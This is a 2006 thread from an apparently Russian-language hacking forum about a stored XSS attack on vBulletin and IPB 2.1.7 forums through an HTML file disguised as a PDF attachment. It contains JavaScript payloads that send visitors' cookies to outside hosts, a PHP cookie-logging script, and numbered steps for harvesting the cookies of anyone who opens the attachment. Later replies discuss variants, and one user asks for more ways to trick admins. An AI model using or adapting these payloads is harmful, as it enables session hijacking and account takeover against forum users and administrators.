Форумы XSS vbulletin and IPB v2.1.7 With IE

Discussion in 'Уязвимости CMS/форумов' started by liauliau, 6 Aug 2006.

  1. liauliau

    liauliau Member

    Joined:
    9 Apr 2005
    Messages:
    30
    Likes Received:
    6
    Reputations:
    -1
    XSS vbulletin and IPB v2.1.7 With IE

    test:<html><script> alert("hello");</script></html>

    -----------------------------------------------------------------

    test.pdf
    ------

    Code:
    <html><script>img = new Image(); img.src = "http://blablabla.org/c.php?c="+document.cookie;</script></html>

    c.php
    -----

    Code:
    <?php 
     $cookie = $_GET['c']; 
     $ip = getenv ('REMOTE_ADDR'); 
     $date=date("m/d/Y g:i:s a"); 
     $referer= getenv ('HTTP_REFERER'); 
     $fl = fopen('log.txt', 'a'); 
     fwrite($fl, "\n".$ip.' :: '.$date."\n".$referer."\n".$cookie."\n"); 
     fclose($fl); 
    ?> 
    1_ Пишут test.pdf и c.php
    2_ Помещенный c.php на webserver.
    3_ Изменяют(Заменяют) url в test.pdf.
    4_ Делают пост с test.pdf как attachement.
    5_, когда кто - то будет смотреть на ваш attachement, Вы получите его печенье в log.txt

    Лог сниффера

    Code:
    <html>
    <script>img = new Image(); img.src ="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
    </html>
     
    #1 liauliau, 6 Aug 2006
    Last edited: 6 Aug 2006
  2. liauliau

    liauliau Member

    Joined:
    9 Apr 2005
    Messages:
    30
    Likes Received:
    6
    Reputations:
    -1
    ребята как заставить его работать ?

    Code:
    <html>
    <script> 
    document.write('<img src="http://blablabla.org/c.php?c='+document.cookie+'" WIDTH=0 HEIGHT=0>'); 
    document.location.href="https://www.google.com/adsense/testmagic.pdf"; 
    </script>
    </html>
    или

    Code:
    <html>
    <script> 
    document.write('<img src="http://antichat.ru/cgi-bin/s.jpg?'+document.cookie+'" WIDTH=0 HEIGHT=0>'); 
    document.location.href="https://www.google.com/adsense/testmagic.pdf"; 
    </script>
    </html>
     
  3. Rebz

    Rebz Banned

    Joined:
    8 Nov 2004
    Messages:
    4,052
    Likes Received:
    1,534
    Reputations:
    1,128
    Дык.. не обязательно pdf. Ещё можно точно такую же шнягу провести и с .html -) В IPB по крайне мере иногда разрешен данный вид атача.
     
  4. MeXoN

    MeXoN New Member

    Joined:
    24 Jul 2006
    Messages:
    13
    Likes Received:
    1
    Reputations:
    0
    Код не работает.=(
     
    1 person likes this.
  5. em00s7

    em00s7 Elder - Старейшина

    Joined:
    2 May 2006
    Messages:
    169
    Likes Received:
    37
    Reputations:
    -10
    MeXoN в каком браузере проверял?
     
  6. MeXoN

    MeXoN New Member

    Joined:
    24 Jul 2006
    Messages:
    13
    Likes Received:
    1
    Reputations:
    0
    Во всех!!
     
  7. MeXoN

    MeXoN New Member

    Joined:
    24 Jul 2006
    Messages:
    13
    Likes Received:
    1
    Reputations:
    0
    Мошь есть какие нить еще способы нае.... Админов=)